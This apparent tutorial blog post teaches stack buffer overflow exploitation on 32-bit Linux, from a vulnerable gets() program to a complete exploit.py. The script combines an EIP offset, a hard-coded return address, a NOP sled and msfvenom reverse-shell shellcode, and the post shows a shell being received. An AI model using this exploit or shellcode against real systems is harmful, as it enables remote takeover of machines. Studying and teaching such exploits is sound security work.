
Memory Corruption to Hack the Machine; Enslaving Software to Run sHell-code

Ameer Hamza

Background

An exploit was unleashed on the internet from a computer at MIT. From colleges to NASA, thousands of machines connected to the internet were infected, in part by exploiting a stack-based buffer overflow. The Harvard graduate responsible was convicted under the Computer Fraud and Abuse Act and sentenced to probation, community service, and a fine.

 

1988 marked the rise of the Internet. Robert Tappan Morris, the son of a renowned computer scientist and cryptographer, was a gifted programmer in his own right. At a time when learning software development, let alone grasping its concepts, was not as easy as it is now, Morris had a computer and a mentor at home. His father had contributed to early versions of Unix, including the math library, the dc calculator language, and the crypt program. In a time when there was no scrolling addiction and time passed slowly, Morris spent his time working with computers and building software programs.

 

Morris developed a program that changed how the software industry thinks about security. Not only did he create a sophisticated, self-propagating program, but he also exploited a security vulnerability that became a bug class of its own. Bugs from this same class are still being discovered to this day. Building a plane today is not as special as being the one who invented the plane and flew it for the first time.

 

This blog covers the buffer overflow vulnerability and how it can be exploited to hack a machine.


Introduction

A stack-based buffer overflow occurs when the data written to a buffer on the stack is larger than the buffer’s storage capacity. If an 8-byte buffer is allocated on the stack and more than 8 bytes are stored in it, the extra bytes overwrite the adjacent memory locations on the stack, which usually causes the program to crash.
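
As a rough illustration, the sketch below simulates this in Python rather than touching real stack memory. A bytearray stands in for a region of memory where an 8-byte buffer sits directly in front of 4 bytes of neighbouring data. The names BUF_SIZE, make_memory, and unchecked_copy are hypothetical and exist only for this example.

```python
BUF_SIZE = 8  # size of the simulated buffer, in bytes


def make_memory() -> bytearray:
    """Simulated memory: an 8-byte buffer followed by 4 bytes of adjacent data."""
    return bytearray(BUF_SIZE) + bytearray(b"\xde\xad\xbe\xef")


def unchecked_copy(memory: bytearray, data: bytes) -> None:
    """Copy data to the start of memory without comparing its length to BUF_SIZE."""
    for i, byte in enumerate(data):
        memory[i] = byte


# 8 bytes fit exactly, so the neighbouring data survives.
mem_ok = make_memory()
unchecked_copy(mem_ok, b"ABCDEFGH")
adjacent_ok = bytes(mem_ok[BUF_SIZE:])

# 12 bytes do not fit: the last 4 spill over into the neighbouring data.
mem_smashed = make_memory()
unchecked_copy(mem_smashed, b"ABCDEFGHIJKL")
adjacent_smashed = bytes(mem_smashed[BUF_SIZE:])

print(adjacent_ok.hex(), adjacent_smashed.hex())
```

On a real stack, the neighbouring data can include saved registers and the return address, which is what makes the overflow dangerous.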

 

The question arises: how can this crash be leveraged to compromise the entire machine?

 

Technical details

Stack

Human beings have two hands, and they can hold two basketballs at a time. If someone throws another basketball at me, I will put one of the basketballs on the table so my hand gets free, and I will catch the next basketball. Now, I have two basketballs in my hands and a third one on the table. If someone keeps throwing the basketballs at me, I will keep repeating the process—placing a basketball on the table and catching the next basketball. 

 

That table is just like the stack in computer architecture, and hands represent CPU registers. Both serve the purpose of holding data. The stack stores local variables, function parameters, or any kind of data that is being stored temporarily until execution is finished. Every function call gets its own stack frame. The stack runs in LIFO mode—last in, first out.
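
The table analogy can be sketched with a plain Python list used as a stack. This is only a model of the last in, first out behaviour, not of real stack memory; the names table and caught_back are made up for the example.

```python
table = []  # the "table" from the analogy, used as a stack

# Each time a new ball arrives, one ball is put down on the table (push).
for ball in ["ball 1", "ball 2", "ball 3"]:
    table.append(ball)

# Picking the balls back up takes the most recently placed one first (pop).
caught_back = []
while table:
    caught_back.append(table.pop())

print(caught_back)
```

The last ball placed on the table is the first one taken back, which is exactly the LIFO order the stack follows.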

 

direction   |---------------------|                   ^
of stack    | Space for arguments | <== $esp (SP)     |
growth      | to called routines  |                   |
     ^      |---------------------|                   |
     |      |  Local variables,   |                   |
     |      |  temporary values   |                   |
     |      |---------------------|                   |
     |      | Other callee-saved  |                   | Current
     |      |      registers      |                   | stack
     |      |---------------------|                   | frame
     |      |   Saved $ebp (FP)   | <== $ebp (FP)     |
     |      |---------------------|                   |
     |      |   Return address    |                   |

 

P.S. I don’t want to bombard you with information regarding how many registers there are and what they do, but I will mention some that are required to understand the bug.

 

In the 32-bit x86 architecture:

 

  • EBP points at the bottom of the stack frame
  • ESP points at the top of the stack frame
  • EIP points to the address of the next instruction to be executed

 

Hence the names eBasePointer, eStackPointer, and eInstructionPointer. Explaining the “E” prefix is out of the scope of this blog; if you are curious, you can visit this link.

0_H8eaKdSdiGQHM_V7.png

 

Function calls: the hidden layer

Programs consist of multiple lines of code/instructions, and they run sequentially. There are multiple registers in computer architecture; one of them is called the “PC” (Program Counter) or “IP” (Instruction Pointer), which holds the address of the next instruction to be executed. 

 

When a function is called, the sequential running of the program gets interrupted because the instruction pointer will jump to the implementation of the function. Before jumping to the implementation of the function, the address of the instruction right after the function call gets stored on the stack so the “IP” (Instruction Pointer) can return to it after completing the implementation of the function. It is called the return address because we return to it after completing the function.

 

Screenshot from 2025-04-13 17-19-55-20250413-121955.png

Stack during Function call. (Copied)

 

After the function completes, the instruction pointer returns to the address that was stored on the stack, and the program resumes executing sequentially as before. Calling a function, in simple words, is: “Store the address of the instruction right after the call, jump to the function implementation, execute the code, and return to the address that was stored earlier.”
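
The call and return steps can be sketched with a toy interpreter in Python. This is a simplified model under stated assumptions: instructions are tuples in a list, list indexes play the role of addresses, and the opcode names call, ret, print, and halt are invented for this example. Real CPUs do considerably more.

```python
# Toy program: index = "address", tuple = instruction.
PROGRAM = [
    ("call", 3),              # 0: main calls func (located at address 3)
    ("print", "Hello Mars!"), # 1: instruction right after the call
    ("halt",),                # 2: end of main
    ("ret",),                 # 3: func returns immediately
]


def run(program):
    """Execute the toy program and return (trace of visited addresses, output)."""
    stack, trace, output = [], [], []
    ip = 0  # instruction pointer
    while True:
        op = program[ip]
        trace.append(ip)
        if op[0] == "call":
            stack.append(ip + 1)  # save the return address on the stack
            ip = op[1]            # jump to the function
        elif op[0] == "ret":
            ip = stack.pop()      # go back to the saved return address
        elif op[0] == "print":
            output.append(op[1])
            ip += 1
        elif op[0] == "halt":
            return trace, output


trace, output = run(PROGRAM)
print(trace, output)
```

The trace shows execution leaving address 0, visiting the function at address 3, and resuming at address 1, the saved return address.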

 

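#include <stdio.h>

/* Does nothing; it exists only so we can watch the call and the return. */
void func(void){
    return;
}
int main(void){
    func();                 /* the call pushes the return address onto the stack */
    printf("Hello Mars!");  /* execution resumes here after func() returns */
    return 0;
}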

 

The above program has been compiled and is being analyzed in the debugger.

The arrow indicates the EIP.

 

Screenshot from 2025-04-09 16-02-17-20250409-110217.png

Top of stack before function call 

 

EIP points at the “call 0x804841d <func>” instruction, which is about to be executed. The top of the stack currently holds an unrelated address that points to zero. Once the call instruction executes, the top of the stack should hold the address 0x8048431, so EIP can come back to it after func() completes.

 

Screenshot from 2025-04-09 16-05-04-20250409-110504.png

Top of stack after call instruction

 

As soon as the call instruction is executed, the return address/next address after the call instruction is pushed onto the stack. ESP points at 0x8048431 <main+14>, and EIP is inside the func();

 

So far, we should know 5 things straight away:

 

  1. How a function call works at a lower level
  2. EBP: Base of the stack frame
  3. Return Address: The address to return to after the function execution is complete
  4. EIP: Points at the next instruction to be executed
  5. ESP: Points at the top of the stack frame

 

Vulnerability Analysis

gets() is a pre-defined function in C that reads a line of text from standard input and stores it in a caller-supplied character buffer. The function stops reading as soon as it encounters a newline character.
 

P.S. The gets() function is probably the most unsafe function that was ever in the C standard library; it was removed from the standard in C11.

 

It is unsafe because the caller has no way to prevent a buffer overflow. The function accepts input from the user and stores it in a buffer, but it is never told the buffer’s size, so it cannot perform bounds checking on its input.

 

buff.c

#include <stdio.h>

int main() {
    char buffer[10];
    printf("Enter some text: ");
    // Using gets() - Vulnerable!
    gets(buffer);
    printf("You entered: %s\n", buffer);
    return 0;
}

 

You can compile this binary on your local machine with the stack protector disabled (-fno-stack-protector) and an executable stack (-z execstack) using:

 

gcc -fno-stack-protector -z execstack buff.c -o buff

 

Vulnerability Discovery

The vulnerability arises when the value stored in a buffer is larger than the buffer’s capacity; the extra bytes smash/overwrite the return address on the stack. Suppose the return address is overwritten with a garbage value such as AAAA (0x41414141). This is not a valid memory address, so when the function returns and EIP is loaded with it, the program crashes. Let’s send a long string of 'A's.

 

Screenshot from 2025-04-11 12-23-04-20250411-072304.png

The program’s happy flow

 

Let’s analyze the bug in GDB by sending a long string of 'A's.

Screenshot from 2025-04-10 18-27-42-20250410-132742.png

EIP and ESP pointing to user supplied data due to buffer overflow.

 

Screenshot from 2025-04-10 18-28-20-20250410-132820.png

Program Crashed because EIP tried to access invalid Address 0x41414141  
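
To see why a string of 'A's shows up as 0x41414141, the small Python sketch below interprets four 'A' bytes the way a 32-bit x86 CPU reads an address, as a little-endian unsigned integer. The variable names are illustrative only.

```python
import struct

overwritten = b"AAAA"  # the 4 bytes that landed on top of the return address

# "<I" means: little-endian, unsigned 32-bit integer.
(address,) = struct.unpack("<I", overwritten)

print(hex(address))  # 0x41414141, since 'A' is 0x41 in ASCII
```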

 

Since we control the return address, if we can make the program return to an invalid address like AAAA, we can make the program return to a valid address as well, and the EIP will start executing the code from that address. Our goal is to place shellcode on the stack and set the stack address in EIP to execute the shellcode.

 

Shellcode

Shellcode is a sequence of machine instructions, written as raw bytes (referred to as byte code in this blog), that the CPU executes directly. A program written in a compiled language can be translated into these bytes, and when those bytes are served to the CPU, they perform the same task the original program was meant to do.

 

Byte code has been extracted from an ELF binary "testcode" using a tool called objdump. Similarly, any program’s byte code can be extracted and served to the CPU. There are also a couple of tools that generate the shellcode, but they are only helpful in particular scenarios.

 

Screenshot from 2025-04-10 16-20-56-20250410-112056.png

Byte code of a program written in the C language.
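
Once the raw bytes have been extracted, they are usually written as a \x-escaped string so they can be pasted into an exploit script. The helper below is a minimal sketch of that formatting step; to_escaped is a hypothetical name, and the sample bytes are arbitrary values chosen for illustration, not a working payload.

```python
def to_escaped(raw: bytes) -> str:
    """Format raw bytes as a \\x-escaped string, e.g. b'\\x31\\xc0' -> '\\x31\\xc0'."""
    return "".join(f"\\x{byte:02x}" for byte in raw)


sample = bytes([0x31, 0xC0, 0x50, 0x68])  # arbitrary example bytes
escaped = to_escaped(sample)

print(escaped)
```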

 

Shellcode written directly in assembly language is compact and gives much finer control over the blockers that get in the way of shellcode execution or break the shellcode, compared to shellcode derived from other languages.

 

In this blog, we are going to use msfvenom to generate shellcode and use it to exploit the bug.

Screenshot from 2025-04-11 19-39-39-20250411-143939.png

 

-p selects the payload, which is specific to the platform being exploited. In our case, it is a payload for Linux x86.

-f selects the output format of the payload, matching the language or file type in which you are going to use it. In the current scenario, it is Python; rb, exe, and c are other examples.

CMD is the command executed when the payload triggers.

Linux’s execve syscall will be called, and the /bin/bash program will be executed.

 

Exploit Development

The goal is to find the offset to overwrite the EIP, place the stack address in it, and place our shellcode on the stack.

[ padding: 'A' * offset ] [ stack address ] [ shellcode ]

There are multiple tools available to assist in exploit development, which can be integrated with GDB to analyze and debug the binary. I will be using Python Exploit Development Assistance, also known as PEDA.

To find the offset to EIP, instead of sending a bunch of 'A's, I will send a unique pattern of 50 characters, then identify which substring of the unique pattern appears in the EIP.

 

Screenshot from 2025-04-11 13-02-02-20250411-080202.png

Unique pattern created via PEDA

 

Screenshot from 2025-04-11 13-04-15-20250411-080415.png

Unique Pattern appears in EIP register

 

Calculating the offset to the value that got caught in EIP will give the exact offset to EIP

Screenshot from 2025-04-11 13-06-04-20250411-080604.png

Offset to EIP
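
The idea behind the unique pattern can be sketched in a few lines of Python. This is not PEDA's own generator: it is a simple Aa0Aa1Aa2... style pattern, and make_pattern and find_offset are hypothetical helper names. The value passed to find_offset is simulated here by reading 4 bytes back out of the pattern, standing in for whatever the debugger reports in EIP.

```python
import string
import struct


def make_pattern(length: int) -> bytes:
    """Build a non-repeating pattern of the form Aa0Aa1Aa2... up to length bytes."""
    chunks = []
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                chunks.append(upper + lower + digit)
                if len(chunks) * 3 >= length:
                    return "".join(chunks)[:length].encode()
    raise ValueError("requested pattern is too long")


def find_offset(pattern: bytes, eip_value: int) -> int:
    """Return where the 4 bytes seen in EIP occur in the pattern (-1 if absent)."""
    needle = struct.pack("<I", eip_value)  # EIP holds the bytes in little-endian order
    return pattern.find(needle)


pattern = make_pattern(50)

# Simulate a crash where bytes 22..25 of the pattern ended up in EIP.
(simulated_eip,) = struct.unpack("<I", pattern[22:26])
offset = find_offset(pattern, simulated_eip)

print(pattern.decode(), hex(simulated_eip), offset)
```

Because every 4-byte window of the pattern is different, the value found in EIP identifies exactly one position, and that position is the offset.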

Any data after the initial 22 bytes will overwrite the saved return address and end up in EIP. Let’s verify this.

 

Screenshot from 2025-04-11 14-57-58-20250411-095758.png

EIP in control

 

To see whether the execution flow jumps to the stack, we overwrite EIP with the ESP address and place a breakpoint byte, \xCC, at the top of the stack, followed by 100 'C' characters where our shellcode will later be placed. If execution does jump to the top of the stack, the CPU will hit the breakpoint that precedes our 'C's, and GDB will report a SIGTRAP.

 

Screenshot 2025-04-18 at 11.19.35 AM.png

 

With this payload, the execution flow should jump to the stack, and EIP should end up at the breakpoint followed by the 'C's. If this happens, it means I can place shellcode instead of a bunch of 'C's, and the malicious code will be executed.

 

Screenshot from 2025-04-11 16-20-39-20250411-112039.png

EIP points at the top of stack

 

Screenshot from 2025-04-11 16-21-28-20250411-112128.png

Stack contains our 100 C chars and a break-point byte code cc

 

Note: \xcc has nothing to do with the character 'C'; we could use any character instead of 'C'. \xcc is the fixed x86 opcode for a breakpoint (INT3), which tells the CPU to pause execution for debugging.
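
The breakpoint test payload described above could be assembled roughly as follows. This is a sketch under assumptions: OFFSET is the 22-byte offset reported earlier in this walkthrough, STACK_ADDR is only a placeholder (the address that appears in exploit.py), and the real value must be read from ESP in your own debugger session. build_test_payload is a hypothetical helper name.

```python
import struct

OFFSET = 22              # offset to EIP reported earlier in this walkthrough
STACK_ADDR = 0xBFFFF6F8  # placeholder; read the real value from ESP in GDB


def build_test_payload(offset: int, stack_addr: int) -> bytes:
    """Padding, then the address to return to, then a breakpoint and 100 'C's."""
    padding = b"A" * offset
    ret_addr = struct.pack("<I", stack_addr)  # 32-bit little-endian address
    breakpoint_byte = b"\xcc"                 # INT3
    filler = b"C" * 100                       # stands in for the shellcode
    return padding + ret_addr + breakpoint_byte + filler


test_payload = build_test_payload(OFFSET, STACK_ADDR)
print(len(test_payload))
```

If GDB stops with a SIGTRAP right after the return, the filler can be swapped for real shellcode.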

 

Now it is time to remove the 'C' characters and place shellcode there. Msfvenom will be used to generate the shellcode, which will initiate a reverse shell.

 

A reverse shell is a type of connection that is established when a script or malicious code is run on the victim’s machine. It creates a connection with the attacker’s machine, and the attacker gets complete access to the victim’s terminal/shell. This is the easiest way to understand a reverse shell.

 

Screenshot from 2025-04-13 15-05-00-20250413-100500.png

Usage of msfvenom, a built-in program in Kali Linux

 

-p indicates the type of payload. In this case, a TCP reverse shell for the Linux x86 platform is generated.

-b lists the bad characters that must not be present in the shellcode; otherwise, the shellcode will break. In the current scenario, \x0a is the newline character, \x0d is the carriage return, and \x00 is the null byte. As soon as the gets() function receives a newline, it stops taking further input, and the null byte marks the end of a C string. For that reason, these bytes must not be present in the shellcode.

LHOST indicates the IP address of the machine that is going to catch the reverse shell.

LPORT indicates the port of the machine that is going to catch the reverse shell.
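
Before using generated shellcode, it can be worth double-checking that none of the bad characters slipped through. The sketch below is one way to do that in Python; find_bad_chars is a hypothetical helper, clean_sample is the first few bytes of the shellcode used in this blog, and dirty_sample is an invented counter-example.

```python
BAD_CHARS = b"\x00\x0a\x0d"  # null byte, newline, carriage return


def find_bad_chars(shellcode: bytes, bad: bytes = BAD_CHARS) -> list:
    """Return (index, byte value) for every bad character found in shellcode."""
    return [(i, byte) for i, byte in enumerate(shellcode) if byte in bad]


clean_sample = b"\xdb\xc5\xd9\x74\x24\xf4"  # first bytes of the shellcode below
dirty_sample = b"\x31\xc0\x0a\x00"          # invented example containing bad bytes

clean_hits = find_bad_chars(clean_sample)
dirty_hits = find_bad_chars(dirty_sample)

print(clean_hits, dirty_hits)
```

An empty result means the shellcode should survive being read by gets() intact.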

exploit.py

 

import struct

buf =  b""
buf += b"\xdb\xc5\xd9\x74\x24\xf4\x5e\x2b\xc9\xb1\x12\xbf"
buf += b"\xd4\xe5\xea\x91\x31\x7e\x17\x03\x7e\x17\x83\x12"
buf += b"\xe1\x08\x64\xab\x31\x3b\x64\x98\x86\x97\x01\x1c"
buf += b"\x80\xf9\x66\x46\x5f\x79\x15\xdf\xef\x45\xd7\x5f"
buf += b"\x46\xc3\x1e\x37\x99\x9b\x85\xd7\x71\xde\x45\xd7"
buf += b"\xfa\x57\xa4\x67\x9a\x37\x76\xd4\xd0\xbb\xf1\x3b"
buf += b"\xdb\x3c\x53\xd3\x8a\x13\x27\x4b\x3b\x43\xe8\xe9"
buf += b"\xd2\x12\x15\xbf\x77\xac\x3b\x8f\x73\x63\x3b"
#Shellcode generated via msfvenom for reverse shell

ret_addr = struct.pack("<I", 0xbffff6f8)
# Return address packed as a 32-bit little-endian value for the x86 arch

payload = b"A" * 22 + ret_addr + b"\x90" * 16 + buf
# 22 is the offset to EIP found with the PEDA pattern above.
# b"\x90" is the NOP (no operation) opcode: it does nothing and execution simply
# moves on to the next instruction, so the NOPs act as padding before the shellcode.

with open("/var/tmp/sHellcode/poc.txt", "wb") as f:
    f.write(payload)
# The payload above is stored in poc.txt, which will be served to the program
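
To make the structure of the payload easier to check, the sketch below shows how the return address is packed in little-endian order and where each part of the payload begins and ends. The layout helper is hypothetical, and the numbers are example values taken from this walkthrough: the 22-byte offset reported by PEDA, the 16 NOPs, and the 95 shellcode bytes listed above.

```python
import struct


def layout(offset: int, nop_len: int, shellcode_len: int) -> dict:
    """Return the (start, end) byte range of each part of the payload."""
    ret_start = offset
    nop_start = ret_start + 4  # a 32-bit return address takes 4 bytes
    shellcode_start = nop_start + nop_len
    return {
        "padding": (0, ret_start),
        "return address": (ret_start, nop_start),
        "nop sled": (nop_start, shellcode_start),
        "shellcode": (shellcode_start, shellcode_start + shellcode_len),
    }


# Little-endian packing stores the least significant byte first.
packed = struct.pack("<I", 0xBFFFF6F8)

parts = layout(offset=22, nop_len=16, shellcode_len=95)

print(packed.hex(), parts)
```

Comparing these ranges with a hex dump of poc.txt is a quick sanity check before running the exploit.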

 

Screenshot from 2025-04-11 19-36-45-20250411-143645.png

Program executed with the above payload

 

Screenshot from 2025-04-13 15-35-24-20250413-103524.png

Reverse Shell received from warzone machine 
 

 

Real World Examples

Case Study

One of the flaws the Morris worm exploited was in the sendmail program, a common email utility on Unix systems.
 

The buffer overflow discussed in the background section was in the fingerd (finger daemon) service, which read its input with gets(). By sending carefully crafted, excessively long input to the fingerd service, the worm could overwrite memory locations, allowing it to inject and execute its own malicious code. This is the specific buffer overflow that the Morris worm used.

 

EternalBlue

A bug in the Windows SMBv1 implementation was reportedly exploited for years by the National Security Agency (NSA), until a hacker group, the Shadow Brokers, leaked the NSA’s exploits publicly in 2017. This turned into a disaster for unpatched Windows machines connected to the internet when the WannaCry ransomware began spreading.

 

There's a security flaw in how Windows handles the SMBv1 protocol. Specifically, when the system processes File Extended Attributes (FEAs), a function in the operating system's core (kernel) can accidentally overflow a memory area called the Large Non-Paged Pool.

 

This happens when the system goes through the FEA list and tries to turn it into a different format (NTFEA LIST). Due to a miscalculation in the total size of the data, it ends up writing more than the memory can handle, causing the overflow.

 

WannaCry

According to Wikipedia, the WannaCry ransomware attack was a worldwide cyberattack in May 2017 by the WannaCry ransomware cryptoworm, which targeted computers running the Microsoft Windows operating system by encrypting data and demanding ransom payments in Bitcoin cryptocurrency. It propagated using EternalBlue.

 

OS Mitigation

Cases like the ones above led operating system vendors to introduce mitigations that make exploitation harder, regardless of which vulnerable software is installed. The types and details of these mitigations are beyond the scope of this blog. However, a cat-and-mouse game has been going on ever since, with most mitigations eventually having a bypass or workaround of some kind. Today, we see everything from pager devices to the latest iPhones being hacked.

 

Bugs Still Being Found

Google Chrome – VP8 Encoding Heap Buffer Overflow (CVE-2023-5217)

VLC Media Player – Heap-based buffer overflow vulnerability (CVE-2020-13428)

cURL – Heap overflow in cURL’s SOCKS5 proxy handshake (CVE-2023-38545)
